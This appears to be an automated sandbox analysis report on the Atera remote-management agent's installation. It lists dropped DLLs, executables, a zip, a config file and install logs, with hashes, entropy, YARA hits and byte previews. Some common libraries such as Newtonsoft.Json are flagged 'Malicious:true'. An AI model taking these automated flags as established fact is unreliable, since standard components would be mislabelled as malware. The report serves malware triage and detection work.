                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........nN\.. ... ... .Q..... .Q...e. .Q..... ..Q#... ..Q%... ..Q$... .8..... ..].... ...!.~. .rQ(... .rQ ... .wQ.... .rQ"... .Rich.. .........................PE..d.....d.........." ......................................................................`.................................................P...x................!......((...........@..p............................A...............................................text...0........................... ..`.rdata...1.......2..................@..@.data....`... ...J..................@....pdata...!......."...P..............@..@.gfids...............r..............@..@.rsrc................t..............@..@.reloc...............~..............@..B................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\x86\SQLite.Interop.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1436200
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.78131691404635
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24576:as5ThI+vIjDEzn7tcBGtYnxLbdVlRdouD5RawYkGq78Yr4i9YE1tOvhefHXCvEsB:hlI+vIjE7mjOuKa8Riy+gvhaIn2+0y
                                                                                                                                                                                                                                                                                              MD5:7C0A2478D0C82CAE07C4435E29A10D4C
                                                                                                                                                                                                                                                                                              SHA1:DEA183C555F7DC655EF9A67CCF887F4529059E4A
                                                                                                                                                                                                                                                                                              SHA-256:68DADEE50F471C04AEF8C9498997F7E7E60100C4D0047784C47F9E8C9BA287C1
                                                                                                                                                                                                                                                                                              SHA-512:6F30F47F6AA27418025A4325604D7EC6931B73544D86705532DAFB8AAEA153DCAE63F58AB51FF49DC7A572B4B38E7BD0AEF2C3CB82C33CE8542DD4D17099AAA5
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......v..{2..(2..(2..(.*W(...(.*U(...(.*T(...(..)%..(..)'..(..)=..(.Im(:..(,.5(1..(2..(...(..)3..(..)3..(..Y(3..(..)3..(Rich2..(........PE..L.....d...........!.....f...X......................................................3.....@.........................P...t.......x....`..................((...p..X...@...p...............................@...............H............................text....d.......f.................. ..`.rdata..............j..............@..@.data....8.......,..................@....gfids.......P.......&..............@..@.rsrc........`.......(..............@..@.reloc..X....p.......2..............@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent.zip

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):584433
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.9996007806235445
                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                              SSDEEP:12288:AaPKah+cOqB7YBiq57hmRYB2Vb7mde3FV/ruWIwUhA2yaJ4Gi1Cx/cL:xiBiqIYQF7/7ruQWA2Xxi1wS
                                                                                                                                                                                                                                                                                              MD5:B50834694383960830CF48D9836E1108
                                                                                                                                                                                                                                                                                              SHA1:ADC80813181B98A8296BEFA2960A55F939F3BFEE
                                                                                                                                                                                                                                                                                              SHA-256:370A259808052366888284B0CC4C91FF8F23E8008003959B8D0EFB1ADBF00CD6
                                                                                                                                                                                                                                                                                              SHA-512:F87BE933E87275B000BE031AA5DF7536DFD5FE9B99A607CE0904F206E074D3A0687A00654B9B78EDAA2FCCF3D30526E0EE5BD7DCBA4A5DAAFD6FC60EEAAA15C5
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:PK..-......FgY...........5...AgentPackageUpgradeAgent/AgentPackageUpgradeAgent.exe....(.......ch......75d..........z..L.....5...*...S.'.?...h.6..Eo....."y......5...z_...y..&....L..ZZ6.....=U...f...JYj......../..~.%......1,=....,.J....eG.=.i..G..I ..6m~.GO...............E,._&;>o.........{....@..Z.S......]....HS..TW...b...#Rh..H...p.|.A_..Q..NZ4`3a.....DE[.!.7.!.......@..]..ja..P.)..C...!g..UUG.........../..uW.&...!g..G.kv.z]C.-..p.....J..j.1".M..Wt.-x_.....&.g.k....Dc.}$".M....=..:......X?..i.peV..'.."-....e)0..'..D....v...1..1..g..X[...`....y....a...R...BE..:!.%{...v.:.K.#h.u..W..L.l..:.M..DXd.&.}......$.........:....D|t3......Q...&.".3>.@.....H.^.@..2. ..../.Y.............np....G.GU\......6.]i(.E).Z?yj..?V.Q.Q2.. ..q .Z4HN...W......G_.E*v3 ...A...4.....r...z..r..3~..i^..Qvj.:O*:.....+...>s&H.d..sF....V.8.~.'*......6..i......<....ol.($....8.E..s.....6...]WF!]P.I...\/..$....Q.4...r.b4S.Z.$..h....Y..5....v..n.2.K.w......(..?.UH..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):57896
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.807323990997079
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:rNvSjQvTQYc1IY1OwcujXQft0k5df9bq76In:rRSjQvMYcSIJcuMftH5d1bqL
                                                                                                                                                                                                                                                                                              MD5:E9794F785780945D2DDE78520B9BB59F
                                                                                                                                                                                                                                                                                              SHA1:293CAE66CEDBC7385CD49819587D3D5A61629422
                                                                                                                                                                                                                                                                                              SHA-256:0568E0D210DE9B344F9CE278291ACB32106D8425BDD467998502C1A56AC92443
                                                                                                                                                                                                                                                                                              SHA-512:1A3C15E18557A14F0DF067478F683E8B527469126792FAE7B78361DAD29317FF7B9D307B5A35E303487E2479D34830AA7E894F2906EFFF046436428ADA9A4534
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....,g.........."...0.................. ........@.. ....................... ...........`.................................<...O.......x...............((........................................................... ............... ..H............text........ ...................... ..`.rsrc...x...........................@..@.reloc..............................@..B................p.......H........X...s...........................................................0..Y........o.......+C......o......r...p.o....t)...r...p(....,.........,..o.......&....X....i2..*..*...........$;..........8G.......0..#.......~....r/..po.......(....}.....{....(....,.rw..ps....z..{....o......r...p.o.......r...p.o....t)...}.....{.....(....,..r...p..o......}......}.....r...po.......r...p.o....t)...}.....{.....(....,..r...p..o......}......}.......,..o.........5.,..o......,..o......,..o....

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe.config

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):535
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.076084597400077
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:MMHdG3VO3rdZRLNFF7ap+5v5OXrRf/2//FicYo4xm:JdfrdDPF7NhOXrRH2/d9r
                                                                                                                                                                                                                                                                                              MD5:D505E3DE03F172FA2B246E210054C5F7
                                                                                                                                                                                                                                                                                              SHA1:F5A480F56F760EEBA3B29108387E54D70A721127
                                                                                                                                                                                                                                                                                              SHA-256:A568F933F09B1AD1EE5E88DDCFFA1FE5921D18B73477136E1FAEE55F2BEF399A
                                                                                                                                                                                                                                                                                              SHA-512:80F01447B43525DBDF5B283522FE14D9AECEF16E55EA3FE36DC0A94B53C49E03BB56136F0911C348FB78FB5AF6112B1DE7C38CBFFBD73ACB2971655EF1B2B859
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" /></startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.ini

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):12
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.584962500721156
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:WhXSnn:WBe
                                                                                                                                                                                                                                                                                              MD5:39DF0BC698F203A4FEF18A68A7B0EADC
                                                                                                                                                                                                                                                                                              SHA1:0EA8D556AF659E0C8D6406B5B3E7E56EE6A10188
                                                                                                                                                                                                                                                                                              SHA-256:F8DD3CEC3612C302B45EA9539002625E58E528A5CB68B4B0E6C3C2A378122C1A
                                                                                                                                                                                                                                                                                              SHA-512:E6FF51381293BFD52EAE39B9868968A76D94BC993BAD5566C532A30E5EE5FE121C2F5B8EAED7ACEE59E3F6B8C1B3BEBB53B07B46F572F3498B1800B0DEAC128D
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:version=27.6

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Atera.AgentPackage.Common.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):96808
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.179305078416296
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:nJt7dqUlizL21LDdeOKTfLz2L506wFj/XxFoKjhJG/50vks00UfgfgvO1762y9:nQUm2H5KTfOLgxFJjE50vksVUfPvO1c9
                                                                                                                                                                                                                                                                                              MD5:BE16D0F73D33053C3817894C955BFA43
                                                                                                                                                                                                                                                                                              SHA1:6B79C7034EE0E4DBC4B90ADC3B47BF395CAE052D
                                                                                                                                                                                                                                                                                              SHA-256:434EA180FF3960ADF251CF34B8333A1BD70EAA7BDF42279317F2ECD7B7CCEAEB
                                                                                                                                                                                                                                                                                              SHA-512:6F08EC35E1D194328CD923FC22C6BBAFB072497ABA03DAC59F8E78C99D2CC3C87237CC5178CFEBA52078AC729286B8221FD7A8CD676A5A49D2879C553DAB332A
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....0.d.........." ..0..H..........zf... ........... ....................................`.................................(f..O.......8............R..((...........d............................................... ............... ..H............text....F... ...H.................. ..`.rsrc...8............J..............@..@.reloc...............P..............@..B................\f......H........k..D............................................................0..>.......~........o....~......(....&.s.......&...~....(....,..(....&..*...........$...........'........(....*.......*.0..4.......(....o....r...p(....r...p(..........(....(......&..*........00......:.(......}....*..0..Z............( ...,......(!...*~..........("........( ...-..(....s#...........,..($.........(!...*..........&E.......0..G........{....,.(......5~%...r'..po&...rm..pr...po'...tR...r...p((..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Microsoft.Deployment.WindowsInstaller.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):186408
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.933461189028906
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:mkfZS7FUguxN+77b1W5GR69UgoCaf8/BCnfKlRUjW01KyFxYV:g+c7b1W4R6joxfQ8Y
                                                                                                                                                                                                                                                                                              MD5:7989DFD7A0AF54F59AD5C3E483A66CF6
                                                                                                                                                                                                                                                                                              SHA1:4F323F2E5174A789A31068DD76355447DB61AFFB
                                                                                                                                                                                                                                                                                              SHA-256:0E47E3F0432060BAE79988A622AAB4334328F85FE443D764D4C81D94C9F3DBAE
                                                                                                                                                                                                                                                                                              SHA-512:757182DF2492B66E06AA3B1854DAB487BB512FC5FBCE869CA4265218F5889D2D5B3748C2FC5B458FA148D10F3F5B61028DCA9B789F6766689BA1A24E9BE06936
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...&..Z.........." ..0...... ......~.... ........... ..............................,Q....@.................................,...O.......................((........................................................... ............... ..H............text....w... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Microsoft.Win32.TaskScheduler.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):331816
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.168523582236471
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:ZBhhiUWKJzPZNRntAXIjxs2f5Jg53XWlvidurmdIq8KmefViYkJTVBXi3VaKtNTk:ZDMUWITZznu85k8Wdn8KmCjIFi3VvY
                                                                                                                                                                                                                                                                                              MD5:41E6FC15337B1F2F556E3DE56D0DB476
                                                                                                                                                                                                                                                                                              SHA1:EF8EAAC6EF9B00383B48762773A5110D7C2F3EEA
                                                                                                                                                                                                                                                                                              SHA-256:81D43F8C0726143F28A33390B78E540C75F48733C3518B9D605C2E52AC0554C4
                                                                                                                                                                                                                                                                                              SHA-512:56956F6BBB56BF481B1434ADC0D37303065206FC4ECA8787B6EC8CD089D7C619875C62BBD282F5F0D9A69820937651968CC343CF5AE251B08345997BDD0555C7
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0.................. ........... .......................@......f.....@.....................................O.......................((... ..........T............................................ ............... ..H............text...<.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H............9..............H.............................................{....*..{....*V.(......}......}....*...0..A........u3.......4.,/(.....{.....{....o....,.(.....{.....{....o....*.*.*. ..<. )UU.Z(.....{....o....X )UU.Z(.....{....o....X*...0..b........r...p......%..{.......%q6....6...-.&.+...6...o.....%..{.......%q7....7...-.&.+...7...o.....(....*..{....*..{....*..{....*r.(......}......}......}....*..0..Y........u8.......L.,G(.....{.....{....o....,/(.....{.....{....o....

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Newtonsoft.Json.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):710184
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.960700401761297
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:NBja5bBvR8Q0TE2HB0WLmvXbsVG1Gw03RzxNHgKhwFBkjSHXP36RMGy1NqTUD:NBjk38WuBcAbwoA/BkjSHXP36RMG+
                                                                                                                                                                                                                                                                                              MD5:2CFBB3EA34E3EAEFB478A1C0BF00190D
                                                                                                                                                                                                                                                                                              SHA1:A9298FD5C46D97C296E06B9D9D4034C2EC657D57
                                                                                                                                                                                                                                                                                              SHA-256:34FFBC77AEA4058D6B4EF621815B5C56EDD35585888FBCC2DE10E7B176EE3A3A
                                                                                                                                                                                                                                                                                              SHA-512:DA46D62BB6466E9B8DF21E75C594C06CBF3D79C8FE6038469B74F6562CCA9B38A482F386034F7B3C0D9DEEA6C5D0420AFE0EA08E59B1BBDA1C07B866D9F0B352
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p$?..........." ..0.............B.... ........... ....................... .......r....`....................................O.......................((.......... ...T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................$.......H.......x...(9............................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\System.Management.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):55848
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.238377987704794
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:SREoc0f5k1KlLoz0WOySMEpnSO7iX16UJKdiYpxDEpYi60WLS:SR8+5k15z0WBZEtgwJx876FG
                                                                                                                                                                                                                                                                                              MD5:2FB2CD6CC7C0B40202165C2ACF27F3FC
                                                                                                                                                                                                                                                                                              SHA1:D3125C28C46AD0083EA1EB65EAE6FA077908D985
                                                                                                                                                                                                                                                                                              SHA-256:4E83AE51D18FABA26E8B1315C199AF46DF7A1AFB18390DB30337679DF54A7812
                                                                                                                                                                                                                                                                                              SHA-512:C84CB5DE47798E6F0459BE87BCBA514FC14531F361909A2B81CFD6B477206B75C9F0F338C1477BF9A87BB7D08ACFEB99342EC5C9F1535F510BE742A27B5ED099
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....<V.........." ..0.................. .........c. ....................... ......s.....`.................................P...O.......H...............((........................................................... ............... ..H............text........ ...................... ..`.rsrc...H...........................@..@.reloc..............................@..B........................H........".................."..P............................................................................................0.......................0.......................................................................................0...............0...................................................................................................0...............0...................................................0...............0..........................................

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Pubnub.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):602672
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.145404526272746
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:UShQrHBJEwJiIJJ8TihsEWdzs29glRleqn4uRTJgwhVHhoNw0r17K7DDaiC3KM+9:gHDxJGihsEKwSuTuwvOWgFA
                                                                                                                                                                                                                                                                                              MD5:17D74C03B6BCBCD88B46FCC58FC79A0D
                                                                                                                                                                                                                                                                                              SHA1:BC0316E11C119806907C058D62513EB8CE32288C
                                                                                                                                                                                                                                                                                              SHA-256:13774CC16C1254752EA801538BFB9A9D1328F8B4DD3FF41760AC492A245FBB15
                                                                                                                                                                                                                                                                                              SHA-512:F1457A8596A4D4F9B98A7DCB79F79885FA28BD7FC09A606AD3CD6F37D732EC7E334A64458E51E65D839DDFCDF20B8B5676267AA8CED0080E8CF81A1B2291F030
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X............." ..0............." ... ...@....... ....................................`.....................................O....@..|...............0(...`..........T............................................ ............... ..H............text...(.... ...................... ..`.rsrc...|....@......................@..@.reloc.......`......................@..B................. ......H............{..................x.......................................r.(......}......}......}....*....0..,........-..{.....o...+.+..{.....{....s.....o...+..*V.(......}......}....*...0...................-..+..o....s"........o$......o,....,..o....,...,....o(........,...oH...,...o......+.......9......o....,..{......o....o....o......s..........o&...8.....{......o....o........9e.....o.....?X.....r...po....9G.....r...po....o....r...p.( ...9&.....r...po....9......r...po....o.....

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\System.ValueTuple.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):73264
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.954475034553661
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:6784YWac+abptsy5VyYc/9n1RcGxzeeUVn9KyQgHo0JuresehaAR7HxRq:67N1r9KGI04CCARLq
                                                                                                                                                                                                                                                                                              MD5:F4D9D65581BD82AF6108CFA3DD265A9A
                                                                                                                                                                                                                                                                                              SHA1:A926695B1E5D3842D8345C56C087E58845307A16
                                                                                                                                                                                                                                                                                              SHA-256:A3219CD30420EBCF7507C9C9F92FD551AE19999BE247CAA861A8A22D265BE379
                                                                                                                                                                                                                                                                                              SHA-512:144C1195A440907592B22FC947F4284CA36869BDAE495EC8CA5212AF4F63E8E8492FB0EC3B37BF66DB912AF30864C69588D0E35ED9B3D24D36DF3B09DDB5B6C3
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....>.Z.........." ..0.................. ... ....... .......................`.......f....@.....................................O.... ..P...............0(...@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...P.... ......................@..@.reloc.......@......................@..B........................H.......$...h...........................................................6..o.........*f..o...........o.........*...o...........o...........o.........*...o...........o ..........o!...........o"........*...o#..........o$..........o%...........o&...........o'........*....0..L.........o(..........o)..........o*...........o+...........o,...........o-........*.0..Y.........o...........o/..........o0...........o1...........o2...........o3...........o4.... ...*....0..k.........o5....

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\AteraAgent.InstallLog

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):753
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.853078320826549
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:qLLYem7haYNem7hcomf3em7hUQLtygXnC9xkKxeCsx/Yem7haYNem7hcomf3em7B:qLUVhzVhM3VhdLtXXIxkKxeCsOVhzVhY
                                                                                                                                                                                                                                                                                              MD5:8298451E4DEE214334DD2E22B8996BDC
                                                                                                                                                                                                                                                                                              SHA1:BC429029CC6B42C59C417773EA5DF8AE54DBB971
                                                                                                                                                                                                                                                                                              SHA-256:6FBF5845A6738E2DC2AA67DD5F78DA2C8F8CB41D866BBBA10E5336787C731B25
                                                                                                                                                                                                                                                                                              SHA-512:CDA4FFD7D6C6DFF90521C6A67A3DBA27BF172CC87CEE2986AE46DCCD02F771D7E784DCAD8AEA0AD10DECF46A1C8AE1041C184206EC2796E54756E49B9217D7BA
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\AteraAgent.InstallLog, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\AteraAgent.InstallLog, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.Installing assembly 'C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe'...Affected parameters are:.. logtoconsole = .. assemblypath = C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe.. logfile = C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog..Installing service AteraAgent.....Service AteraAgent has been successfully installed...Creating EventLog source AteraAgent in log Application.....Committing assembly 'C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe'...Affected parameters are:.. logtoconsole = .. assemblypath = C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe.. logfile = C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\AteraAgent.InstallState

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (7463), with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):7466
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.1606801095705865
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:96:R3DrP/zatgCnNjn1x62muDr9aHmzcv/65m7JDcm0BefnanGEkn56vT4ZvR++JDr+:NexdYX7OSRjXsaA0Ndhi
                                                                                                                                                                                                                                                                                              MD5:362CE475F5D1E84641BAD999C16727A0
